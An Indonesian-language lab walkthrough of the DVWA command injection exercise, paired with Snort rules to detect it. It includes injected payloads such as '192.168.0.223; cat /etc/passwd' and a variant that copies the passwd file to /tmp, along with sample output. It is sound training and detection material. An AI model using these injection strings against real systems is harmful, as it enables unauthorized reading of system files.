DVWA: Command Injection
- Login ke DVWA
- Klik Command Injection
- Ping isi IP yang bisa di ping misalnya, router anda, misalnya
192.168.0.223
- Hasilnya kira-kira
PING 192.168.0.223 (192.168.0.223) 56(84) bytes of data. 64 bytes from 192.168.0.223: icmp_seq=1 ttl=64 time=0.560 ms 64 bytes from 192.168.0.223: icmp_seq=2 ttl=64 time=0.696 ms 64 bytes from 192.168.0.223: icmp_seq=3 ttl=64 time=0.692 ms 64 bytes from 192.168.0.223: icmp_seq=4 ttl=64 time=0.631 ms --- 192.168.0.223 ping statistics --- 4 packets transmitted, 4 received, 0% packet loss, time 2999ms rtt min/avg/max/mdev = 0.560/0.644/0.696/0.063 ms
- Tambahkan perintah cat sesudah nomor IP, misalnya
192.168.0.223; cat /etc/passwd
PING 192.168.0.223 (192.168.0.223) 56(84) bytes of data. 64 bytes from 192.168.0.223: icmp_seq=1 ttl=64 time=0.560 ms 64 bytes from 192.168.0.223: icmp_seq=2 ttl=64 time=0.696 ms 64 bytes from 192.168.0.223: icmp_seq=3 ttl=64 time=0.692 ms 64 bytes from 192.168.0.223: icmp_seq=4 ttl=64 time=0.631 ms --- 192.168.0.223 ping statistics --- 4 packets transmitted, 4 received, 0% packet loss, time 2999ms rtt min/avg/max/mdev = 0.560/0.644/0.696/0.063 ms root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin .. .. dst
- Lihat source DVWA mengapa melakukan hal itu
cat /var/www/html/DVWA-1.9/vulnerabilities/exec/source/low.php
- Kalau iseng, coba copy password ke tmp, inject command
192.168.1.106; cat /etc/passwd | tee /tmp/passwd
Snort Rule
Untuk mendeteksi kegiatan ini, bisa tambahkan di snort local.rules beberapa alternatif rules berikut
alert tcp any any -> 192.168.0.100 80 (msg:"passwd"; content:"passwd"; nocase; classtype:web-application-attack; sid:1000020;) alert tcp any any -> 192.168.0.100 80 (msg:"/passwd"; content:"%2Fpasswd"; nocase; classtype:web-application-attack; sid:1000020;) alert tcp any any -> 192.168.0.100 80 (msg:"/etc/passwd"; content:"%2Fetc%2Fpasswd"; nocase; classtype:web-application-attack; sid:1000021;) alert tcp any any -> 192.168.0.100 80 (msg:"cat+%2Fetc%2Fpasswd"; content:"cat+%2Fetc%2Fpasswd"; nocase; classtype:web-application-attack; sid:1000022;)
sebaiknya pilih yang paling spesifik, jangan yang general.